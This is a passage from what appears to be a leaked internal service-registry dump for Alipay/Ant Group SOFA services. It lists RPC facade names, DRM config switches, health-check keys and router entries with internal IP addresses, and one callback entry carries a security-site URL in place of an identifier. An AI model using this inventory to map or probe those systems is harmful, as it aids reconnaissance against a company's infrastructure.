rservice.MobileAdapterService:1.0:instservicecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@fuelprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","NS_Servers_TP_C_FUND_REDEEMAPPLY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insadvisor.facade.decision.DecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:resmng-applyAllocateOrderPMCCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.biz.alert.DingDingOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.GrayPublishManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.234.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_OPENINSIGHT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.ebpp.RuleConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExAgreementQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtaskcenter.service.facade.YebPlusFileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbillingcore.common.service.facade.BussAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofademo.point.FirstTccPointAction:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.BioProductQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingcore.common.service.facade.minitor.InsMktMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fund.api.QueryInstReconLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.baas.logistic.finance.rpc.LFWaybillOrderRpc:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.apply.CreditCardLoanApplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.eco.EcoTinyappDetectSerialDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkqamng_business_account_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.tvm.vul.BatchVulManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:meshysale@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.common.service.facade.AntassistantWeatherServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.mobilegw.QueryAppInfoWithBackupClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@links#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.insqa.facade.gift.GiftSendManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.rule.KbdishMaterialRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.180.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.charityprod.commom.service.facade.CharityBaseGZFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finfoprodContentDetailProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.conf.LabelConfManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.BatchPayReceiptService:1.0:tradecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.agdscc.common.service.facade.service.AgdsCreditPersonalAmtCapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finscprod.facade.prophet.UserSeasonRankQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.serverGrayPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.campaign.mng.SearchStrategyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.sector.AntSectorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.12.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antcloud.opsware.rest.StackSofaRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antmobilecloudtest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSHEALTHCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vouchercore.service.facade.api.ConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fporgassetdecision.common.service.facade.api.TxnArrQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxianprod.finance.facade.ReservePolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.dr.DRSwitchDispatcher:1.0:dns-idc-dr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.moonlight.api.MlctransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.emergency.ability.facade.AssetOrderEmergencyAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:mytradeapi@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.ServicePointService:1.0.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctudb.CtuProcessRecordQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobileacauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.meta.MetaPluginFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:filecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pcinstprod_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.CampOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_guarManagerModifyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.level0VelocityCorePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.MenuItemManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.api.MessageAssembleService:1.0:superlink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_ALIFI_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.databusReadProdTransGray,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.10.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.faasset.api.order.FaOrderAssetCommonTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-materialcenter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.MobileLBSFindResourceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.RobotService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.65.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.socialopen.TaskOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.order.ExecutionOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.recruit.ApplySubOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finquotationcenter.common.service.facade.api.PlaybackFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.antloanmarket.service.AntLoanMarketFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.PersonasQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:UcdpmngAntProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.cloudprovision.conf.requestconfig.dockerClientReadTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.paydecision.MajorPayChannelCfgManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.virtual.VirtualCanvasModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.StuffTemplateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:auroraDeployService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.AppointmentConfRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.144.224#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.finassetprod.FinAssetProdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recadmin.data.service.notify.ds.AirBaseDS:1.0:airBaseDS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradeasyn.service.facade.TradeAsynBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.SchemaConfigHisQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebTransNoTradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.displayAllowWithdrawAccTrans,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publicexprod.common.service.facade.search.SearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gftms.facade.api.basic.subaccount.SubAccountOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.faudiorec.common.service.facade.mini.MiniVersionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.commonreservation.ShopConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.fileReGenerateIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextLoadTestTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.rundata.RunDataWriteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.trace.ContentTraceRemoteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:utraffictrip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:financemngProcessmngCallbackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settleprod.service.facade.gcard.PhoneCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelEngineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alm.service.facade.facade.ClearingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.afwrobottwa:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:batchpayprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_ZM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.ThemeModuleDrmResource.defaultPageSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasset.common.service.facade.stuff.api.ImportKaApplyOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.170.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.peerpayprod.senior.common.service.facade.family.api.InnerFamilyLockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:meshysale_waterAndGasBillAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finhadecision.common.service.facade.api.EmergencyEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","flow-control-channel/default/broker-channel-ptm#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue5#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finquantprod.facade.common.facade.api.RomeNotifyApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.patrol.record.PatrolRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","mrchservbase@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:bizfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundbuss.common.facade.query.AccountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SDL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartsql.service.facade.service.ProjectService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.sandboxhome.aqcPaas_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuprod.biz.community.user.SecuInstitutionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msfluxconf:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.mergeSyncTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.custview.facade.ContactPointViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:publichome_applyTemplateCardCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.job.JobBizConfActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_ACCOUNT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:test-core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.ZoneCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alstudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.27.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.college.material.MaterialQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.appclient.process.ProcessFlowAccessor:1.0:processmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.FaAssetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprocess.sip.action.Action:1.0:o2OAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.order.OcOrderManageRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundWebsiteCustomerCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.178.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.18.116.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.recmixer.common.service.facade.CategoryRecProviderService:1.0:imasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.variable.facade.VariableQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.counter.api.CounterQueryFacadeV3:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.inner.MiniVersionQueryInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.OverseaRemitQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:mytradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.paygrowth.common.service.facade.task.GrowthTaskRpcTrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.debittrans.service.facade.ipaytrans.api.IpayAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficintelbiz.common.service.facade.api.DataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.question.structured.facade.RouteMapQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.postProcessConfigs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.motoBankIdSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antbuservice@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zcache.switcher.customerTairCache.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iopengw.service.facade.OutOpengwSyncCallBack:1.0:mockUniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.JuryContentManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-DAYUTRPROD-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mayibank.bkarchplus.kg.KgGatewayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.199.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appxprod.common.service.facade.api.apply.ApplyInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.55.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbminiapp.common.service.facade.tr.rollback.RollbackOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authprod.facade.account.TrustLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcmerchantprod.facade.hbpoint.HbPointBudgetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@peerpayprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.smartscene.common.facade.schedule.PlanScheduleOdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openitemcore.common.service.facade.api.ordercore.ConsumerServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:http://www.freebuf.com/@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.core.service.api.InwardPaymentProcessService:1.0:remittanceInwardPayProcessService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antargus.common.service.facade.AntArgusIdentityServiceRequest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:fundcardprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.clivecenter.common.service.facade.api.ClcMessageQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fingiftprodTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.InsPolicyAccessRemove2388DrmClient.forceReturn2088ResultSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.ProtocolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.atlas.EpRelationshipService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.tag.MerchantTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_Q_DOOM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cfpcenter.emergency.biz.aemc.startrule.AlarmHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zcache.switcher.riskmngPunishcenterTairCache.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.manager.forecast.BankCashForecastRecordManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.OpenAPIService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promocenter.facade.api.wealth.WealthActivityManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountcore.common.service.facade.MdiscountUnionRefundService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.api.ReconcileBillService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:tsm@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.common.event.UniformEventPublisher:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","fincommontaskhub@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.pcreditBusinessConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditint.facade.service.RefundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iregulation.common.service.facade.api.ComplianceTuitionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.OrderLinkAdjustService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetSellerPunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.agreementlog.PcreditAgreementLogFacade:1.0@DEFAULT#